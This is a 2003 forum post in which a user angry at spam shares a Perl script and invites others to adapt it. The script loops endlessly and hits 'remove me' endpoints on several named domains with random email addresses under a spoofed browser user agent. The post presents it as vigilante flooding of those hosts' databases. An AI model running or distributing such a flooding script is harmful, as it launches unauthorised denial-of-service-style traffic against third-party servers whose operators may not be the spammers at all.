IBM developerWorks
           Scripts
 
Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
User Name:
Password:
Remember me
Go Back   Dev Shed ForumsWeb Site ManagementScripts

Reply
Add This Thread To:
  Del.icio.us   Digg   Google   Spurl   Blink   Furl   Simpy   Y! MyWeb 
Thread Tools Search this Thread Rate Thread Display Modes
 
Unread Dev Shed Forums Sponsor:
You eat, breathe and sleep innovation. Build your mobile intelligence with BlackBerry® experts this July. Register Today!
  #1  
Old November 28th, 2003, 04:49 AM
RichA. RichA. is offline
Contributing User
Dev Shed Newbie (0 - 499 posts)
 
Join Date: Jan 2002
Posts: 171 RichA. User rank is Just a Lowly Private (1 - 20 Reputation Level) 
Time spent in forums: < 1 sec
Reputation Power: 7
Angry Sick of Spam

I am SOOOOOO sick of spammers, I decided to hit back.
Most of these mails are just a means of forcing you to try and "remove" yourself, and the removal is fake, instead adding your valid email address to their list of valid emails addresses.

To this end, I decided to fight back. I would "prime" these collection scripts, sending thousands of random email addresses into the DB.
Either their DB becomes overloaded , or at the least, it's full of rubbish.

Please feel free to amend the script below, so that those who have spammed you are likewise cascaded with random addresses.

-----------------------------------

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$a="qwertyuiopasdfghjklzxcvbnm";
@b=split(//,$a);
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
while(true){ $c=$d=$e=""; for $i (1 .. 8){ $c.=$b[int rand($#b + 4)];
$d.=$b[int rand($#b + 4)]; $e.=$b[int rand($#b + 4)]; }
$url1="http://www.macresofit.com/homepage/cgi-bin/removeme.cgi?submit=Submit&email=$d\@$e.com\n";
$req1 = HTTP::Request->new("GET","$url1");
$a1=$ua->simple_request($req1);
$url2="http://www.macresofit.com/homepage/cgi-bin/removeme.cgi?submit=Submit&email=$c\@aol.com\n";
$req2 = HTTP::Request->new("GET","$url2");
$a2=$ua->simple_request($req2);
$count++;
print "$url1\n$url2\n$count\n";
$url1="http://www.superwondersrin.com/homepage/cgi-bin/removeme.cgi?submit=Submit&email=$d\@$e.com\n";
$req1 = HTTP::Request->new("GET","$url1");
$a1=$ua->simple_request($req1);
$url2="http://www.superwondersrin.com/homepage/cgi-bin/removeme.cgi?submit=Submit&email=$c\@aol.com\n";
$req2 = HTTP::Request->new("GET","$url2");
$a2=$ua->simple_request($req2);
$count++;
print "$url1\n$url2\n$count\n";
$url1="http://plusherbal.biz/cgi-bin/out.cgi?addr=$d\@$e.com\n";
$req1 = HTTP::Request->new("GET","$url1");
$a1=$ua->simple_request($req1);
$url2="http://plusherbal.biz/cgi-bin/out.cgi?addr=$c\@aol.com\n";
$req2 = HTTP::Request->new("GET","$url2");
$a2=$ua->simple_request($req2);
$count++;
print "$url1\n$url2\n$count\n";
$url1="http://www.bystronah.biz/out.php?email=$d\@$e.com\n";
$req1 = HTTP::Request->new("GET","$url1");
$a1=$ua->simple_request($req1);
$url2="http://www.bystronah.biz/out.php?email=$c\@aol.com\n";
$req2 = HTTP::Request->new("GET","$url2");
$a2=$ua->simple_request($req2);
$count++;
print "$url1\n$url2\n$count\n";
}
__________________
Candyman. CandyMan. Candy ... Oh, Hi !

Reply With Quote
Reply

Viewing: Dev Shed ForumsWeb Site ManagementScripts > Sick of Spam


Thread Tools  Search this Thread 
Search this Thread:

Advanced Search
Display Modes  Rate This Thread 
Rate This Thread:


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
View Your Warnings | New Posts | Latest News | Latest Threads | Shoutbox
Forum Jump


Forums: » Register « |  User CP |  Games |  Calendar |  Members |  FAQs |  Sitemap |  Support | 
  
 

IBM developerWorks




© 2003-2008 by Developer Shed. All rights reserved. DS Cluster 1 hosted by Hostway